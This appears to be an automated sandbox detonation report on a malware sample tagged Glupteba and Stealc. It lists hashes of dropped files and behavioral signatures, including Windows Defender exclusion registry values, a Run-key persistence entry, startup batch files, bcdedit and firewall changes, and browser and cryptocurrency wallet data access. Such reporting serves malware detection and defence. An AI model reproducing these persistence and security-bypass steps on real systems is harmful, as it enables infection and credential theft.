| MD5 | 8fa2408d910be9dce6f9858022150406 |
| SHA1 | 03dc0edc485333c3717cd58bae04098a583cf736 |
| SHA256 | 098230832f445dfefd5c5a3e5265e14dc1b8256463956dcf663119f2f684be9b |
| SHA512 | 3f4360560921dd0a9b40c720593a09bc896381bd90c2c42f16c5117d27d03dca1b113d4089707d6e2fed93c4cec65bed24dcbae838399fd24957b6da95230359 |
memory/1276-698-0x0000000010000000-0x00000000105E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\assistant_installer.exe
| MD5 | 6c6af30fc8c72df4054836835cdcc2b9 |
| SHA1 | a4178dde02ba2fe7200394363f8295e30cbe7f0e |
| SHA256 | e59b794d2a8a95ce735116ff5c7ab7c490ef25bdac66bbe0325da015183cf4d4 |
| SHA512 | 37384582b8cf545bb7f1304fcc9abddc12b21aff6f5ec36163bee7c485a4ae585f64589cef7e07a397d3f04e491497a119ea5fbce71aeeb22b92093fae886a67 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
| MD5 | 14f3dacbc42e9fa889a042c94dfbaf6b |
| SHA1 | cb00b215ed3ca23d61bd365c5a3fa80d0d64dc23 |
| SHA256 | 6aea23c8b5474adcc0051455b11ef1dc71fe40e8fc3f427936107d7091281f56 |
| SHA512 | b80799c3eb6f40d93b8633484421e8d2f3cf36a9656730db955d4c398374278a2b7fe146b6018c76137fc1174a2df617adf52083de157dd997b122ced4434198 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403280219401\assistant\dbghelp.dll
| MD5 | 86aae03168dc5769d0bb2a6c678c3f9f |
| SHA1 | b303ea8334145c03ef9449dcc13fff7e5ad7e23e |
| SHA256 | 2de5ddb62d5f1a1ae0a3873365cda0dd391f1b9560c2759d7c349b0a22dca907 |
| SHA512 | 0ca8e79ec66c8141f3690e0a7d1554f0be8cbbafec12c5ed85a5b95cfed5288ec79affbca044a5c097354a233067a495dd6758e98fda0f573fd57f8c3c171515 |
C:\Users\Admin\AppData\Local\Temp\CAFIJKFHIJ.exe
| MD5 | fe380780b5c35bd6d54541791151c2be |
| SHA1 | 7fe3a583cf91474c733f85cebf3c857682e269e1 |
| SHA256 | b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53 |
| SHA512 | ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c |
memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 80d3b08f8b3b5b368c12f3a5b02b62c0 |
| SHA1 | 61cf15ecb26b148e3dca3e00915cef3856465ea5 |
| SHA256 | 40d5d8f773a0e2db2dec43884242aa0dd9fbb52d5ca02513e69f6818f3911073 |
| SHA512 | 01dea22b76ccf21331a7a69b4a10c7ea825563ef09a5473ee2a8d20506f7eaf1491fba7ef8710054cef9e1e30c39460fac143951ed97eecee4065a5c54ac7b58 |
memory/2636-781-0x00007FF710C60000-0x00007FF7116C1000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e1365d3249b1c880978c5c80054fb5ee |
| SHA1 | b43c7fc4d450fab0f10a949900a915e409d3fde9 |
| SHA256 | d437dff5a78b4539fd5734e508d8e71055e55047248c3486af134773a9ef7d85 |
| SHA512 | efa3bc1f990b27ee641b16cc143129473786acc5201b006a441b8902802c4833036d548ea1af58f50220a36f3982e26037f9cddb2e628314ca1d97a0ccb425da |
C:\Users\Admin\Pictures\2sK9qcVeMtm0aymJpbObEY9P.exe
| MD5 | 0f111be013a482e0ccf44ebba5f4a916 |
| SHA1 | dd36dde631de362b62fc16dda303d4d7b9b0e9a7 |
| SHA256 | 4dff3db1960417d7d3a4c668523899df2f2d3f7560725e9d17eceeaa707e8f1d |
| SHA512 | eb2f3f959dd942f7db50a7e6f535ad04a0ec9d5ac30d6c77642fb7879076a721f67b2f7dfd118c53a5bdf1335bd22125064c103f06a0a0c129360c5caffac1a9 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 02cee518ef7a6090e03aef118f7e3214 |
| SHA1 | 3c2cc060c629f4cf97b13df0ff4491ec858d2667 |
| SHA256 | 7881f16a0d87799fa09d71c25346aff7f10517b44858ac14521a9c62e43a9b4e |
| SHA512 | ade7cdf54a3869069d9f5c74976ab470733924b34f2946996fdb9db843d188ba2490dbd25becc7c6b324dc7acc6f96fd980e5d47027890c1d6a0161306b5cac5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs.js
| MD5 | f71925823078c6e61ccbf92c65516186 |
| SHA1 | c3403bd7858ec535855305f2fd0d4d0607a827b7 |
| SHA256 | b063a62a0f8beb00d9518b3c5b591d754c2bcd4f5e99aecc9f560d172ba90091 |
| SHA512 | 1b7b0b3c0aa0933b3fa40fa95b51c902169dfaf3667dd94bf081cad0325fa13ce8b18cd354cac6e1102137d55ade970d10c65a2f0720a414f8261beddb8219f5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 5be4bcea71a53e213d346a603bd3bfac |
| SHA1 | 4f103d1fa1ca9bfa82a08f9128b05db8cd52b1c6 |
| SHA256 | d597731b02d59bda87c7196999dde832494e03e1488396387399a0ca911f9bc7 |
| SHA512 | 2dd0234289d76a6e313b170f89dc40d7989623d4da742898018cbf8fbce946feec2209465e8cd985d56f729490bcc978e17078f6f0b22af14526114e77bee56c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 85a0f93ea503b31a86f73a9e18338a8f |
| SHA1 | c90e0392dbef35d28360f2f6775523a2a601b73c |
| SHA256 | 44904d113f31e65946b3df2901348b9a3844e4ef347dd66d63fc68141da48115 |
| SHA512 | 6ee3e40cbda78b721ec2c39c8d81edcec60ecc2f6ad238b4e5501f6b4f3fb0f01e0cc00b4444677d7c6db0c7bf4e20098e80ef563b62cdea9bded6bfe93d6013 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 03e015f325b17e6fd9c389f7d87442af |
| SHA1 | a51d6cf13a9a06c17e0ad6eb12f50c6d2b467244 |
| SHA256 | b63bc97c5a9e854c8e8baa68eaebda2a5c3f5fff3c328c5ea486e2444af9c013 |
| SHA512 | 4ca72e6c8e0ea391aabd14f4bd76f771e9230ed390226ecd96649f65d21bc263a03731f90136ead2173e0568a927899c83b58a1dfc92cce54877aefde2900129 |
C:\Users\Admin\AppData\Local\Temp\7zSC052.tmp\__data__\config.txt
| MD5 | 1148b375036c5a094b0d25842adc6fae |
| SHA1 | f8f531ea1fbdec43e078f4d0c02edb7b6d21125b |
| SHA256 | f0a7339abbc424ff0311937c5c8b3cb7ed9cf4dba3d291f0c2c04830edb4e793 |
| SHA512 | 19ea815cdea57f90763d52c5c26651fc288ca6a6ac71eadec5572626a17a6617d1bbeccc5c2e8c8d60baff08f8ab315dee1234cc0da5bd289f49f5277897381b |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-28 02:19
Reported
2024-03-28 02:21
Platform
win7-20240221-en
Max time kernel
148s
Max time network
146s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
Stealc
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\XaSfgFUxnhzcT2cWMqIx13Hz.exe = "0" | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\CBSnoej4iNufmT6hyzvcTZte.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\A6jYsiO1FW5u5LjazQ6CsBo4.exe = "0" | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
Detect binaries embedding considerable number of MFA browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables (downloaders) containing URLs to raw contents of a paste
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing a Discord URL observed in first stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing URLs to raw contents of a Github gist
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing artifacts associated with disabling Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables packed with Themida
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many varying, potentially fake Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
UPX dump on OEP (original entry point)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koDrfNoKNzB2KENCWBM0lY7D.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rViCrRcDjhv6WiRlx7AhYOnU.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L840sHQX0ZMsBVUxUUOA0NZC.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\j0n5PJLeTc0OYAbXRnvTjXbD.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qOetm9tnRy0yJ86ISiGCasqP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9pMKvoh9SoYKqhCWz7Mqc3Ad.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uS9tgOhlKXy53wxxGmdxioq3.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DClVR15QZ9g2RAkdmPFcO8M9.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bUSyy6Vrhg8aXXq8sFhzrziZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\XaSfgFUxnhzcT2cWMqIx13Hz.exe = "0" | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\CBSnoej4iNufmT6hyzvcTZte.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\A6jYsiO1FW5u5LjazQ6CsBo4.exe = "0" | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
